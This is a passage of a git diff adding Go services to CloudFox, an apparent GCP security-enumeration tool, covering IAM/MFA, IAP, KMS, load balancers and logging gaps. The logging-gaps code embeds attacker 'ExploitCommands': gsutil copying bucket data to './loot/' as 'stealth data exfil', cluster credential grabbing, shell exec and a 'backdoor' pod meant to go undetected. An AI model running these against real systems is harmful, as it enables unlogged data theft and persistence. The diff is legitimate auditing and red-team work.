which requires admin privileges + // For now, we'll attempt to look up the user and note if we can't + + var ciService *cloudidentity.Service + var err error + if s.session != nil { + ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) + } else { + ciService, err = cloudidentity.NewService(ctx) + } + if err != nil { + status.Error = "Cloud Identity API not accessible" + return status, nil + } + + // Try to look up the user - this gives us some info but not 2SV status directly + // The Admin SDK would be needed for full 2SV info + lookupReq := ciService.Groups.Lookup() + // We can't directly query user 2SV via Cloud Identity + // This would require Admin SDK with admin.directory.users.get + _ = lookupReq + + status.Error = "2SV status requires Admin SDK access" + return status, nil +} + +// GetBulkMFAStatus attempts to get MFA status for multiple users +// Returns a map of email -> MFAStatus +func (s *IAMService) GetBulkMFAStatus(ctx context.Context, emails []string) map[string]*MFAStatus { + results := make(map[string]*MFAStatus) + + for _, email := range emails { + // Skip non-user emails (service accounts, groups, etc.) 
+ if strings.HasSuffix(email, ".iam.gserviceaccount.com") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A (service account)", + } + continue + } + if strings.Contains(email, "group") || !strings.Contains(email, "@") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A", + } + continue + } + + status, _ := s.GetUserMFAStatus(ctx, email) + results[email] = status + } + + return results +} + +// ============================================================================ +// Enhanced Combined IAM with All Scopes +// ============================================================================ + +// EnhancedIAMData holds comprehensive IAM data including org/folder bindings +type EnhancedIAMData struct { + ScopeBindings []ScopeBinding `json:"scopeBindings"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + MFAStatus map[string]*MFAStatus `json:"mfaStatus"` +} + +// CombinedIAMEnhanced retrieves all IAM-related data including org/folder bindings +func (s *IAMService) CombinedIAMEnhanced(ctx context.Context, projectIDs []string, projectNames map[string]string) (EnhancedIAMData, error) { + var data EnhancedIAMData + data.MFAStatus = make(map[string]*MFAStatus) + + // Get all scope bindings (org, folder, project) + scopeBindings, err := s.GetAllScopeIAM(ctx, projectIDs, projectNames) + if err != nil { + return data, fmt.Errorf("failed to get scope bindings: %v", err) + } + data.ScopeBindings = scopeBindings + + // Collect unique user emails for MFA lookup + userEmails := make(map[string]bool) + for _, sb := range scopeBindings { + if sb.MemberType == "User" { + userEmails[sb.MemberEmail] = true + } + } + + // Get MFA status for users (best effort) + var emailList []string + for email := range userEmails { + emailList = append(emailList, email) + } + data.MFAStatus = s.GetBulkMFAStatus(ctx, emailList) + + // Get service accounts and custom roles for 
each project + for _, projectID := range projectIDs { + // Service accounts + serviceAccounts, err := s.ServiceAccounts(projectID) + if err == nil { + data.ServiceAccounts = append(data.ServiceAccounts, serviceAccounts...) + } + + // Custom roles + customRoles, err := s.CustomRoles(projectID) + if err == nil { + data.CustomRoles = append(data.CustomRoles, customRoles...) + } + } + + // Extract groups from scope bindings + groupMap := make(map[string]*GroupInfo) + for _, sb := range scopeBindings { + if sb.MemberType == "Group" { + if _, exists := groupMap[sb.MemberEmail]; !exists { + groupMap[sb.MemberEmail] = &GroupInfo{ + Email: sb.MemberEmail, + ProjectID: sb.ScopeID, // Use first scope where seen + Roles: []string{}, + } + } + groupMap[sb.MemberEmail].Roles = append(groupMap[sb.MemberEmail].Roles, sb.Role) + } + } + for _, g := range groupMap { + data.Groups = append(data.Groups, *g) + } + + return data, nil +} diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go new file mode 100644 index 00000000..e235cb94 --- /dev/null +++ b/gcp/services/iapService/iapService.go @@ -0,0 +1,172 @@ +package iapservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + iap "google.golang.org/api/iap/v1" +) + +type IAPService struct { + session *gcpinternal.SafeSession +} + +func New() *IAPService { + return &IAPService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *IAPService { + return &IAPService{session: session} +} + +// IAPSettingsInfo represents IAP settings for a resource +type IAPSettingsInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + ResourceType string `json:"resourceType"` // compute, app-engine, etc. 
+ ResourceName string `json:"resourceName"` + IAPEnabled bool `json:"iapEnabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + OAuth2ClientSecretSha string `json:"oauth2ClientSecretSha"` + AccessDeniedPageURI string `json:"accessDeniedPageUri"` + CORSAllowedOrigins []string `json:"corsAllowedOrigins"` + GCIPTenantIDs []string `json:"gcipTenantIds"` + ReauthPolicy string `json:"reauthPolicy"` +} + +// TunnelDestGroup represents an IAP tunnel destination group +type TunnelDestGroup struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + CIDRs []string `json:"cidrs"` + FQDNs []string `json:"fqdns"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ListTunnelDestGroups retrieves tunnel destination groups +func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + var groups []TunnelDestGroup + + // List across common regions + regions := []string{"us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1", "-"} + + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/iap_tunnel/locations/%s", projectID, region) + resp, err := service.Projects.IapTunnel.Locations.DestGroups.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, group := range resp.TunnelDestGroups { + info := TunnelDestGroup{ + Name: extractName(group.Name), + ProjectID: projectID, + Region: region, + CIDRs: group.Cidrs, + FQDNs: group.Fqdns, + } + + // Fetch IAM bindings for this tunnel dest group + info.IAMBindings = 
s.getTunnelDestGroupIAMBindings(service, group.Name) + + groups = append(groups, info) + } + } + + return groups, nil +} + +// getTunnelDestGroupIAMBindings retrieves IAM bindings for a tunnel destination group +func (s *IAPService) getTunnelDestGroupIAMBindings(service *iap.Service, resourceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.V1.GetIamPolicy(resourceName, &iap.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// GetIAPSettings retrieves IAP settings for a resource +func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { + ctx := context.Background() + var service *iap.Service + var err error + + if s.session != nil { + service, err = iap.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = iap.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + settings, err := service.V1.GetIapSettings(resourcePath).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + info := &IAPSettingsInfo{ + Name: settings.Name, + ProjectID: projectID, + ResourceName: resourcePath, + } + + if settings.AccessSettings != nil { + if settings.AccessSettings.OauthSettings != nil { + info.OAuth2ClientID = settings.AccessSettings.OauthSettings.LoginHint + } + // CorsSettings doesn't have AllowHttpOptions as a list - it's a bool + // Skip CORS parsing for now + if settings.AccessSettings.GcipSettings != nil { + info.GCIPTenantIDs = settings.AccessSettings.GcipSettings.TenantIds + } + if settings.AccessSettings.ReauthSettings != nil { + info.ReauthPolicy = settings.AccessSettings.ReauthSettings.Method + } + } + + 
return info, nil +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go new file mode 100644 index 00000000..097dd801 --- /dev/null +++ b/gcp/services/kmsService/kmsService.go @@ -0,0 +1,279 @@ +package kmsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + kms "google.golang.org/api/cloudkms/v1" +) + +type KMSService struct{} + +func New() *KMSService { + return &KMSService{} +} + +// KeyRingInfo holds KMS key ring details +type KeyRingInfo struct { + Name string + ProjectID string + Location string + CreateTime string + + // Keys in this key ring + KeyCount int +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// CryptoKeyInfo holds KMS crypto key details with security-relevant information +type CryptoKeyInfo struct { + Name string + ProjectID string + Location string + KeyRing string + Purpose string // ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC + CreateTime string + + // Version info + PrimaryVersion string + PrimaryState string + VersionCount int + + // Security configuration + RotationPeriod string + NextRotationTime string + DestroyScheduledDuration string + ProtectionLevel string // SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC + + // Import info (indicates external key import) + ImportOnly bool + + // Labels + Labels map[string]string + + // IAM + IAMBindings []IAMBinding + IsPublicEncrypt bool + IsPublicDecrypt bool +} + +// KeyRings retrieves all KMS key rings in a project +func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { + ctx := context.Background() + + service, err := kms.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var 
keyRings []KeyRingInfo + + // List key rings across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.KeyRings.List(parent) + err = call.Pages(ctx, func(page *kms.ListKeyRingsResponse) error { + for _, kr := range page.KeyRings { + info := parseKeyRingInfo(kr, projectID) + + // Get key count for this key ring + keyCount, _ := ks.getKeyCount(service, kr.Name) + info.KeyCount = keyCount + + keyRings = append(keyRings, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + return keyRings, nil +} + +// CryptoKeys retrieves all crypto keys in a project +func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { + ctx := context.Background() + + service, err := kms.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keys []CryptoKeyInfo + + // First get all key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + return nil, err + } + + // Then get keys from each key ring + for _, kr := range keyRings { + keyRingName := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name) + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err = call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + for _, key := range page.CryptoKeys { + info := parseCryptoKeyInfo(key, projectID, kr.Location, kr.Name) + + // Try to get IAM policy + iamPolicy, iamErr := ks.getKeyIAMPolicy(service, key.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublicEncrypt, info.IsPublicDecrypt = parseKeyBindings(iamPolicy) + } + + keys = append(keys, info) + } + return nil + }) + + if err != nil { + // Continue with other key rings even if one fails + continue + } + } + + return keys, nil +} + +// parseKeyRingInfo extracts relevant information from a KMS key ring +func 
parseKeyRingInfo(kr *kms.KeyRing, projectID string) KeyRingInfo { + info := KeyRingInfo{ + Name: extractName(kr.Name), + ProjectID: projectID, + CreateTime: kr.CreateTime, + } + + // Extract location from key ring name + // Format: projects/{project}/locations/{location}/keyRings/{keyRing} + parts := strings.Split(kr.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + return info +} + +// parseCryptoKeyInfo extracts relevant information from a KMS crypto key +func parseCryptoKeyInfo(key *kms.CryptoKey, projectID, location, keyRing string) CryptoKeyInfo { + info := CryptoKeyInfo{ + Name: extractName(key.Name), + ProjectID: projectID, + Location: location, + KeyRing: keyRing, + Purpose: key.Purpose, + CreateTime: key.CreateTime, + Labels: key.Labels, + ImportOnly: key.ImportOnly, + } + + // Rotation configuration + if key.RotationPeriod != "" { + info.RotationPeriod = key.RotationPeriod + } + if key.NextRotationTime != "" { + info.NextRotationTime = key.NextRotationTime + } + + // Destroy scheduled duration + if key.DestroyScheduledDuration != "" { + info.DestroyScheduledDuration = key.DestroyScheduledDuration + } + + // Primary version info + if key.Primary != nil { + info.PrimaryVersion = extractVersionNumber(key.Primary.Name) + info.PrimaryState = key.Primary.State + info.ProtectionLevel = key.Primary.ProtectionLevel + } + + // Version template for protection level + if info.ProtectionLevel == "" && key.VersionTemplate != nil { + info.ProtectionLevel = key.VersionTemplate.ProtectionLevel + } + + return info +} + +// getKeyCount gets the number of crypto keys in a key ring +func (ks *KMSService) getKeyCount(service *kms.Service, keyRingName string) (int, error) { + ctx := context.Background() + count := 0 + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err := call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + count += len(page.CryptoKeys) + return nil + }) + + if err != nil { + return 0, err + } + + 
return count, nil +} + +// getKeyIAMPolicy retrieves the IAM policy for a crypto key +func (ks *KMSService) getKeyIAMPolicy(service *kms.Service, keyName string) (*kms.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(keyName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseKeyBindings extracts all IAM bindings and checks for public access +func parseKeyBindings(policy *kms.Policy) (bindings []IAMBinding, publicEncrypt bool, publicDecrypt bool) { + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on encrypt/decrypt roles + if member == "allUsers" || member == "allAuthenticatedUsers" { + switch binding.Role { + case "roles/cloudkms.cryptoKeyEncrypter": + publicEncrypt = true + case "roles/cloudkms.cryptoKeyDecrypter": + publicDecrypt = true + case "roles/cloudkms.cryptoKeyEncrypterDecrypter": + publicEncrypt = true + publicDecrypt = true + } + } + } + } + return +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// extractVersionNumber extracts the version number from a crypto key version name +func extractVersionNumber(versionName string) string { + parts := strings.Split(versionName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return versionName +} diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go new file mode 100644 index 00000000..5c9b66b3 --- /dev/null +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -0,0 +1,273 @@ +package loadbalancerservice + +import ( + "context" + "strings" + + 
gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type LoadBalancerService struct { + session *gcpinternal.SafeSession +} + +func New() *LoadBalancerService { + return &LoadBalancerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoadBalancerService { + return &LoadBalancerService{session: session} +} + +// LoadBalancerInfo represents a load balancer configuration +type LoadBalancerInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // HTTP, HTTPS, TCP, SSL, UDP, INTERNAL + Scheme string `json:"scheme"` // EXTERNAL, INTERNAL + Region string `json:"region"` // global or regional + IPAddress string `json:"ipAddress"` + Port string `json:"port"` + Protocol string `json:"protocol"` + + // Backend info + BackendServices []string `json:"backendServices"` + BackendBuckets []string `json:"backendBuckets"` + HealthChecks []string `json:"healthChecks"` + + // SSL/TLS config + SSLPolicy string `json:"sslPolicy"` + SSLCertificates []string `json:"sslCertificates"` + MinTLSVersion string `json:"minTlsVersion"` + + // Security config + SecurityPolicy string `json:"securityPolicy"` // Cloud Armor +} + +// SSLPolicyInfo represents an SSL policy +type SSLPolicyInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + MinTLSVersion string `json:"minTlsVersion"` + Profile string `json:"profile"` // COMPATIBLE, MODERN, RESTRICTED, CUSTOM + CustomFeatures []string `json:"customFeatures"` +} + +// BackendServiceInfo represents a backend service +type BackendServiceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Protocol string `json:"protocol"` + Port int64 `json:"port"` + HealthCheck string `json:"healthCheck"` + SecurityPolicy string `json:"securityPolicy"` + EnableCDN bool `json:"enableCdn"` + SessionAffinity string `json:"sessionAffinity"` + ConnectionDraining int64 
`json:"connectionDraining"` + Backends []string `json:"backends"` +} + +// ListLoadBalancers retrieves all load balancers in a project +func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalancerInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var loadBalancers []LoadBalancerInfo + + // Get global forwarding rules (external HTTP(S), SSL Proxy, TCP Proxy) + globalFwdRules, err := service.GlobalForwardingRules.List(projectID).Context(ctx).Do() + if err == nil { + for _, rule := range globalFwdRules.Items { + lb := s.parseForwardingRule(rule, projectID, "global") + loadBalancers = append(loadBalancers, lb) + } + } + + // Get regional forwarding rules (internal, network LB) + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalRules, err := service.ForwardingRules.List(projectID, region.Name).Context(ctx).Do() + if err == nil { + for _, rule := range regionalRules.Items { + lb := s.parseForwardingRule(rule, projectID, region.Name) + loadBalancers = append(loadBalancers, lb) + } + } + } + } + + return loadBalancers, nil +} + +// ListSSLPolicies retrieves all SSL policies +func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SSLPolicyInfo + + resp, err := 
service.SslPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := range resp.Items { + info := SSLPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + MinTLSVersion: policy.MinTlsVersion, + Profile: policy.Profile, + CustomFeatures: policy.CustomFeatures, + } + policies = append(policies, info) + } + + return policies, nil +} + +// ListBackendServices retrieves all backend services +func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendServiceInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var backends []BackendServiceInfo + + // Global backend services + globalBackends, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, backend := range globalBackends.Items { + info := s.parseBackendService(backend, projectID) + backends = append(backends, info) + } + } + + // Regional backend services + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalBackends, err := service.RegionBackendServices.List(projectID, region.Name).Context(ctx).Do() + if err == nil { + for _, backend := range regionalBackends.Items { + info := s.parseRegionalBackendService(backend, projectID, region.Name) + backends = append(backends, info) + } + } + } + } + + return backends, nil +} + +func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, projectID, region string) LoadBalancerInfo { + info := LoadBalancerInfo{ + Name: rule.Name, + ProjectID: projectID, + Region: region, + IPAddress: rule.IPAddress, + Port: rule.PortRange, + 
Protocol: rule.IPProtocol, + } + + // Determine load balancer type + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + info.Scheme = "EXTERNAL" + } else { + info.Scheme = "INTERNAL" + } + + // Determine type based on target + if rule.Target != "" { + if strings.Contains(rule.Target, "targetHttpProxies") { + info.Type = "HTTP" + } else if strings.Contains(rule.Target, "targetHttpsProxies") { + info.Type = "HTTPS" + } else if strings.Contains(rule.Target, "targetSslProxies") { + info.Type = "SSL_PROXY" + } else if strings.Contains(rule.Target, "targetTcpProxies") { + info.Type = "TCP_PROXY" + } else if strings.Contains(rule.Target, "targetPools") { + info.Type = "NETWORK" + } else if strings.Contains(rule.Target, "targetGrpcProxies") { + info.Type = "GRPC" + } + } else if rule.BackendService != "" { + info.Type = "INTERNAL" + info.BackendServices = []string{extractName(rule.BackendService)} + } + + return info +} + +func (s *LoadBalancerService) parseBackendService(backend *compute.BackendService, projectID string) BackendServiceInfo { + info := BackendServiceInfo{ + Name: backend.Name, + ProjectID: projectID, + Protocol: backend.Protocol, + Port: backend.Port, + EnableCDN: backend.EnableCDN, + SessionAffinity: backend.SessionAffinity, + } + + if backend.SecurityPolicy != "" { + info.SecurityPolicy = extractName(backend.SecurityPolicy) + } + + if len(backend.HealthChecks) > 0 { + info.HealthCheck = extractName(backend.HealthChecks[0]) + } + + if backend.ConnectionDraining != nil { + info.ConnectionDraining = backend.ConnectionDraining.DrainingTimeoutSec + } + + for _, be := range backend.Backends { + info.Backends = append(info.Backends, extractName(be.Group)) + } + + return info +} + +func (s *LoadBalancerService) parseRegionalBackendService(backend *compute.BackendService, projectID, region string) BackendServiceInfo { + info := s.parseBackendService(backend, projectID) + return info +} + +func extractName(fullPath 
string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/loggingGapsService/loggingGapsService.go b/gcp/services/loggingGapsService/loggingGapsService.go new file mode 100644 index 00000000..ba16c85f --- /dev/null +++ b/gcp/services/loggingGapsService/loggingGapsService.go @@ -0,0 +1,472 @@ +package logginggapsservice + +import ( + "context" + "fmt" + "strings" + + logging "cloud.google.com/go/logging/apiv2" + "cloud.google.com/go/logging/apiv2/loggingpb" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" + "google.golang.org/api/iterator" +) + +type LoggingGapsService struct{} + +func New() *LoggingGapsService { + return &LoggingGapsService{} +} + +// LoggingGap represents a resource with missing or incomplete logging +type LoggingGap struct { + ResourceType string // compute, cloudsql, gke, bucket, project + ResourceName string + ProjectID string + Location string + LoggingStatus string // disabled, partial, misconfigured + MissingLogs []string // Which logs are missing + StealthValue string // HIGH, MEDIUM, LOW - value for attacker stealth + Recommendations []string + ExploitCommands []string // Commands to exploit the gap +} + +// AuditLogConfig represents the audit logging configuration for a project +type AuditLogConfig struct { + ProjectID string + DataAccessEnabled bool + AdminActivityEnabled bool // Always on, but good to verify + SystemEventEnabled bool + PolicyDeniedEnabled bool + ExemptedMembers []string + ExemptedServices []string +} + +// EnumerateLoggingGaps finds resources with logging gaps +func (s *LoggingGapsService) EnumerateLoggingGaps(projectID string) ([]LoggingGap, *AuditLogConfig, error) { + var gaps []LoggingGap + + // Get project-level audit log config + auditConfig, err := 
s.getProjectAuditConfig(projectID) + if err != nil { + auditConfig = &AuditLogConfig{ProjectID: projectID} + } + + // Check various resource types for logging gaps + if bucketGaps, err := s.checkBucketLogging(projectID); err == nil { + gaps = append(gaps, bucketGaps...) + } + + if computeGaps, err := s.checkComputeLogging(projectID); err == nil { + gaps = append(gaps, computeGaps...) + } + + if gkeGaps, err := s.checkGKELogging(projectID); err == nil { + gaps = append(gaps, gkeGaps...) + } + + if sqlGaps, err := s.checkCloudSQLLogging(projectID); err == nil { + gaps = append(gaps, sqlGaps...) + } + + // Check for log sinks that might be misconfigured + if sinkGaps, err := s.checkLogSinks(projectID); err == nil { + gaps = append(gaps, sinkGaps...) + } + + return gaps, auditConfig, nil +} + +func (s *LoggingGapsService) getProjectAuditConfig(projectID string) (*AuditLogConfig, error) { + ctx := context.Background() + client, err := logging.NewConfigClient(ctx) + if err != nil { + return nil, err + } + defer client.Close() + + config := &AuditLogConfig{ + ProjectID: projectID, + AdminActivityEnabled: true, // Always enabled + } + + // List log sinks to understand logging configuration + parent := fmt.Sprintf("projects/%s", projectID) + it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) + + for { + sink, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Check if there's a sink for audit logs + if strings.Contains(sink.Filter, "protoPayload.@type") { + config.DataAccessEnabled = true + } + } + + return config, nil +} + +func (s *LoggingGapsService) checkBucketLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := storage.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Buckets.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, bucket := range resp.Items { + missingLogs := []string{} + 
loggingStatus := "enabled" + + // Check if bucket logging is enabled + if bucket.Logging == nil || bucket.Logging.LogBucket == "" { + missingLogs = append(missingLogs, "Access logs disabled") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "MEDIUM", + Recommendations: []string{ + "Enable access logging for the bucket", + fmt.Sprintf("gsutil logging set on -b gs://%s gs://%s", bucket.Name, bucket.Name), + }, + ExploitCommands: []string{ + fmt.Sprintf("# Access without logs - stealth data exfil:\ngsutil cp gs://%s/* ./loot/ 2>/dev/null", bucket.Name), + fmt.Sprintf("# List contents without being logged:\ngsutil ls -r gs://%s/", bucket.Name), + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkComputeLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + // Check VPC flow logs on subnets + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnets := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, subnet := range subnets.Subnetworks { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if VPC flow logs are enabled + if subnet.LogConfig == nil || !subnet.LogConfig.Enable { + missingLogs = append(missingLogs, "VPC Flow Logs disabled") + loggingStatus = "disabled" + } else if subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC" { + missingLogs = append(missingLogs, "VPC Flow Logs not at max granularity") + loggingStatus = "partial" + } + + if 
len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "subnet", + ResourceName: subnet.Name, + ProjectID: projectID, + Location: regionName, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable VPC Flow Logs on subnet", + "Set aggregation interval to 5 seconds for maximum visibility", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Network activity on this subnet won't be logged"), + fmt.Sprintf("# Lateral movement within VPC: %s", subnet.IpCidrRange), + }, + } + gaps = append(gaps, gap) + } + } + } + return nil + }) + + return gaps, err +} + +func (s *LoggingGapsService) checkGKELogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := container.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, err + } + + for _, cluster := range resp.Clusters { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check logging service + if cluster.LoggingService == "" || cluster.LoggingService == "none" { + missingLogs = append(missingLogs, "Cluster logging disabled") + loggingStatus = "disabled" + } else if cluster.LoggingService != "logging.googleapis.com/kubernetes" { + missingLogs = append(missingLogs, "Not using Cloud Logging") + loggingStatus = "partial" + } + + // Check monitoring service + if cluster.MonitoringService == "" || cluster.MonitoringService == "none" { + missingLogs = append(missingLogs, "Cluster monitoring disabled") + } + + // Check for specific logging components + if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil { + components := cluster.LoggingConfig.ComponentConfig.EnableComponents + hasSystemComponents := false + hasWorkloads := false + for _, comp := range components { + if comp == "SYSTEM_COMPONENTS" 
{ + hasSystemComponents = true + } + if comp == "WORKLOADS" { + hasWorkloads = true + } + } + if !hasSystemComponents { + missingLogs = append(missingLogs, "System component logs disabled") + } + if !hasWorkloads { + missingLogs = append(missingLogs, "Workload logs disabled") + } + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "gke", + ResourceName: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "CRITICAL", + Recommendations: []string{ + "Enable Cloud Logging for GKE cluster", + "Enable SYSTEM_COMPONENTS and WORKLOADS logging", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Get credentials for cluster with limited logging:\ngcloud container clusters get-credentials %s --location=%s --project=%s", cluster.Name, cluster.Location, projectID), + "# Run commands without workload logging:\nkubectl exec -it -- /bin/sh", + "# Deploy backdoor pods without detection:\nkubectl run backdoor --image=alpine -- sleep infinity", + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check database flags for logging + if instance.Settings != nil && instance.Settings.DatabaseFlags != nil { + hasQueryLogging := false + hasConnectionLogging := false + + for _, flag := range instance.Settings.DatabaseFlags { + // MySQL flags + if flag.Name == "general_log" && flag.Value == 